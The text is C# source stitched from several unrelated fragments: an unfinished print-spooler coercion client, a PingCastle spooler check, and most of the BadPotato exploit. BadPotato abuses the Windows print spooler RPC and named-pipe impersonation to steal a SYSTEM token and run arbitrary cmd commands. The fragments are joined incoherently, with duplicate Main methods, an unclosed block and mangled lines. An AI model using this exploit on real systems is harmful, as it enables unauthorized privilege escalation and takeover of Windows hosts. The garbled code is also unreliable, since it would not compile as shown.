static void Main(string[] args)
{
//for reference https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-RPRN/%5bMS-RPRN%5d.pdf
Console.WriteLine("SpoolSamplerNET client01 dc01");
string captureServer = "\\\\" + args[0];
string printerHost = "\\\\" + args[1];
rprn printer = new rprn();
rprn.DEVMODE_CONTAINER devmodeContainer = new rprn.DEVMODE_CONTAINER();
if (printer.RpcOpenPrinter(printerHost, out var handle, null, ref devmodeContainer, 0) != 0)
{
Console.WriteLine("[-] Failed to open printer over RPC");
return;
}
public static bool CheckIfTheSpoolerIsActive(string computer)
{
IntPtr hHandle = IntPtr.Zero;
var test = new rprn();
var devmodeContainer = new PingCastle.RPC.rprn.DEVMODE_CONTAINER();
try
{
var ret = test.RpcOpenPrinter("\\\\" + computer, out hHandle, null, ref devmodeContainer, 0);
if (ret == 0)
{
return(true);
}
}
finally
{
if (hHandle != IntPtr.Zero)
{
test.RpcClosePrinter(ref hHandle);
}
}
return(false);
}
static void Main(string[] args)
{
Console.WriteLine(@"[*]
____ ______ __ __
/ __ )____ _____/ / __ \____ / /_____ _/ /_____
/ __ / __ `/ __ / /_/ / __ \/ __/ __ `/ __/ __ \
/ /_/ / /_/ / /_/ / ____/ /_/ / /_/ /_/ / /_/ /_/ /
/_____/\__,_/\__,_/_/ \____/\__/\__,_/\__/\____/
Github:https://github.com/BeichenDream/BadPotato/ By:BeichenDream
");
if (args.Length < 1)
{
Console.WriteLine("[!] No Command");
return;
}
SECURITY_ATTRIBUTES securityAttributes = new SECURITY_ATTRIBUTES();
string pipeName = Guid.NewGuid().ToString("N");
Console.WriteLine("[*] PipeName : " + string.Format("\\\\.\\pipe\\{0}\\pipe\\spoolss", pipeName));
Console.WriteLine("[*] ConnectPipeName : " + string.Format("\\\\{0}/pipe/{1}", Environment.MachineName, pipeName));
IntPtr pipeHandle = CreateNamedPipeW(string.Format("\\\\.\\pipe\\{0}\\pipe\\spoolss", pipeName), 0x00000003 | 0x40000000, 0x00000000, 10, 2048, 2048, 0, ref securityAttributes);
if (pipeHandle != IntPtr.Zero)
{
Console.WriteLine(string.Format("[*] {0} Success! IntPtr:{1}", "CreateNamedPipeW", pipeHandle));
rprn rprn = new rprn();
DEVMODE_CONTAINER dEVMODE_CONTAINER = new DEVMODE_CONTAINER();
IntPtr rpcPrinterHandle = IntPtr.Zero;
rprn.RpcOpenPrinter(string.Format("\\\\{0}", Environment.MachineName), out rpcPrinterHandle, null, ref dEVMODE_CONTAINER, 0);
if (rpcPrinterHandle != IntPtr.Zero)
{
if (rprn.RpcRemoteFindFirstPrinterChangeNotificationEx(rpcPrinterHandle, 0x00000100, 0, string.Format("\\\\{0}/pipe/{1}", Environment.MachineName, pipeName), 0) != -1)
{
Console.WriteLine(string.Format("[*] {0} Success! IntPtr:{1}", "RpcRemoteFindFirstPrinterChangeNotificationEx", rpcPrinterHandle));
Thread thread = new Thread(() => ConnectNamedPipe(pipeHandle, IntPtr.Zero));
thread.Start();
if (thread.Join(5000))
{
Console.WriteLine("[*] ConnectNamePipe Success!");
StringBuilder stringBuilder = new StringBuilder();
GetNamedPipeHandleState(pipeHandle, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero, stringBuilder, stringBuilder.Capacity);
Console.WriteLine("[*] CurrentUserName : "******"[*] CurrentConnectPipeUserName : "******"[*] ImpersonateNamedPipeClient Success!");
IntPtr hSystemToken = IntPtr.Zero;
if (OpenThreadToken(GetCurrentThread(), 983551, false, ref hSystemToken))
{
Console.WriteLine(string.Format("[*] {0} Success! IntPtr:{1}", "OpenThreadToken", hSystemToken));
IntPtr hSystemTokenDup = IntPtr.Zero;
if (DuplicateTokenEx(hSystemToken, 983551, 0, 2, 1, ref hSystemTokenDup))
{
Console.WriteLine(string.Format("[*] {0} Success! IntPtr:{1}", "DuplicateTokenEx", hSystemTokenDup));
if (SetThreadToken(IntPtr.Zero, hSystemToken))
{
Console.WriteLine("[*] SetThreadToken Success!");
Console.WriteLine("[*] CurrentThreadUserName : "******"[*] {0} Success! out_read:{1} out_write:{2}", "CreateOutReadPipe", out_read, out_write));
}
else
{
Console.WriteLine("[!] CreateOutReadPipe fail!");
}
if (CreatePipe(ref err_read, ref err_write, ref saAttr, 0))
{
Console.WriteLine(string.Format("[*] {0} Success! err_read:{1} err_write:{2}", "CreateErrReadPipe", err_read, err_write));
}
else
{
Console.WriteLine("[!] CreateErrReadPipe fail!");
}
SetHandleInformation(out_read, 0x00000001, 0);
SetHandleInformation(err_read, 0x00000001, 0);
STARTUPINFO si = new STARTUPINFO();
PROCESS_INFORMATION pi = new PROCESS_INFORMATION();
si.cb = Marshal.SizeOf(si);
si.lpDesktop = @"WinSta0\Default";
si.hStdOutput = out_write;
si.hStdError = err_write;
si.dwFlags |= 0x00000100;
string lpApplicationName = Environment.SystemDirectory + "/cmd.exe";
string lpCommandLine = "cmd /c " + args[0];
// bool flag=CreateProcessAsUserW(hSystemTokenDup, null, lpCommandLine, IntPtr.Zero, IntPtr.Zero, false, 0, IntPtr.Zero, Environment.SystemDirectory, ref si, out pi);
if (CreateProcessWithTokenW(hSystemTokenDup, 0, null, lpCommandLine, 0x08000000, IntPtr.Zero, Environment.CurrentDirectory, ref si, out pi))
{
Console.WriteLine(string.Format("[*] {0} Success! ProcessPid:{1}", "CreateProcessWithTokenW", pi.dwProcessId));
CloseHandle(out_write);
CloseHandle(err_write);
byte[] buf = new byte[4098];
int dwRead = 0;
while (ReadFile(out_read, buf, 4098, ref dwRead, IntPtr.Zero))
{
byte[] outBytes = new byte[dwRead];
Array.Copy(buf, outBytes, dwRead);
Console.WriteLine(System.Text.Encoding.Default.GetString(outBytes));
}
while (ReadFile(err_read, buf, 4098, ref dwRead, IntPtr.Zero))
{
byte[] outBytes = new byte[dwRead];
Array.Copy(buf, outBytes, dwRead);
Console.WriteLine(System.Text.Encoding.Default.GetString(outBytes));
}
CloseHandle(err_read);
CloseHandle(out_read);
CloseHandle(out_write);
CloseHandle(err_write);
CloseHandle(hSystemTokenDup);
CloseHandle(hSystemToken);
CloseHandle(rpcPrinterHandle);
CloseHandle(pipeHandle);
Console.WriteLine("[*] Bye!");
}
else
{
Console.WriteLine(new System.ComponentModel.Win32Exception(Marshal.GetLastWin32Error()).Message);
Console.WriteLine("[!] CreateProcessWithTokenW fail!");
}
}
else
{
Console.WriteLine(new System.ComponentModel.Win32Exception(Marshal.GetLastWin32Error()).Message);
Console.WriteLine("[!] SetThreadToken fail!");
}
}
else
{
Console.WriteLine(new System.ComponentModel.Win32Exception(Marshal.GetLastWin32Error()).Message);
Console.WriteLine("[!] DuplicateTokenEx fail!");
}
}
else
{
Console.WriteLine(new System.ComponentModel.Win32Exception(Marshal.GetLastWin32Error()).Message);
Console.WriteLine("[!] OpenThreadToken fail!");
}
}
else
{
Console.WriteLine(new System.ComponentModel.Win32Exception(Marshal.GetLastWin32Error()).Message);
Console.WriteLine("[!] ImpersonateNamedPipeClient fail!");
}
}
else
{
CloseHandle(rpcPrinterHandle);
CloseHandle(pipeHandle);
Console.WriteLine("[!] ConnectNamePipe Time Out!");
}
}
else
{
Console.WriteLine(new System.ComponentModel.Win32Exception(Marshal.GetLastWin32Error()).Message);
Console.WriteLine("[!] RpcRemoteFindFirstPrinterChangeNotificationEx fail!");
}
}
else
{
CloseHandle(pipeHandle);
Console.WriteLine("[!] RpcOpenPrinter fail!");
}
}
else
{
Console.WriteLine(new System.ComponentModel.Win32Exception(Marshal.GetLastWin32Error()).Message);
Console.WriteLine("[!] CreateNamedPipeW fail!");
}
}